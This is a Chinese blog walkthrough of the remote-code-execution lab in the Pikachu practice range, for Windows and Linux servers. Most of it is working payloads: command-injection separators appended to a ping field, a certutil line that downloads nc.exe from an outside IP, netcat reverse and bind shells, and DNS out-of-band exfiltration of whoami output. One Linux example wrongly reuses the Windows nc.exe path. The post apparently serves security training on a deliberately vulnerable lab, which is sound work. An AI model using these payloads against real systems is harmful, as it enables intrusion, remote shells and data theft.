Pikachu之RCE全解:Windows与Linux系统网站的rce~payload~


Pikachu靶场是一个极具挑战性的网络安全练习平台,其中的远程代码执行(RCE)漏洞更是许多初学者学习和掌握的重要课题。本文将针对Pikachu靶场中的RCE漏洞,分别介绍在Windows和Linux服务器上的rce详细解决方案。


在Windows服务器上,通过ping命令执行命令时可能会出现乱码问题。针对这一问题,可以参考以下解决方案:pikachu中RCE出现乱码的解决的方案_pikachu rce乱码-CSDN博客


服务器为Windows系统的Pikachu网站

解法一:payload

127.0.0.1 && dir
127.0.0.1 & dir
127.0.0.1 | dir
127 || dir

在这里插入图片描述

解法二:通过上传nc来执行命令

127.0.0.1 & certutil.exe -urlcache -split -f http://43.139.186.80:80/nc.exe c://nc.exe

解法二.1:攻击者监听,网站主动连接给出shell

网站:
127.0.0.1 & c://nc.exe -e cmd 192.168.196.181 5566
攻击者:
nc -lvvp 5566

解法二.2:网站监听并给出shell,攻击者连接

网站:
127.0.0.1 & c://nc.exe -e cmd -lvvp 5566
攻击者:
nc 192.168.88.136 5566

在这里插入图片描述

解法三:利用dns外带平台解决无回显问题

powershell $x=whoami;$x=$x.replace('\','xxx');$y='.外连dns域名;$z=$x+$y;ping $z
去掉反斜杠的是因为结果带有“\”会导致ping命令无法执行

在这里插入图片描述


服务器为linux系统的pikachu网站

解法一:payload:

127.0.0.1 && dir
127.0.0.1 & dir
127.0.0.1 | dir
127 || dir
`whoami`
;whoami

在这里插入图片描述

解法二:利用dns外带平台解决无回显问题

`whoami`.域名

在这里插入图片描述

解法三:使用nc执行任意命令

解法三.1:攻击者监听,网站主动连接给出shell

网站:
127.0.0.1 & nc -e /bin/bash 192.168.196.181 5566
攻击者:
nc -lvvp 5566

解法三.2:网站监听并给出shell,攻击者连接

网站:
127.0.0.1 & c://nc.exe -e /bin/bash -lvvp 5566
攻击者:
nc 192.168.88.136 5566

总结

通过以上方法,可以有效地在Windows和Linux服务器上解决Pikachu靶场中的RCE漏洞问题。

对于初学者来说,掌握这些方法不仅能提高漏洞利用的技能,还能加深对系统命令执行原理的理解。

希望本文能对你在Pikachu靶场中的RCE漏洞挑战有所帮助。如果你有任何问题或需要进一步的帮助,请随时联系我。

  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值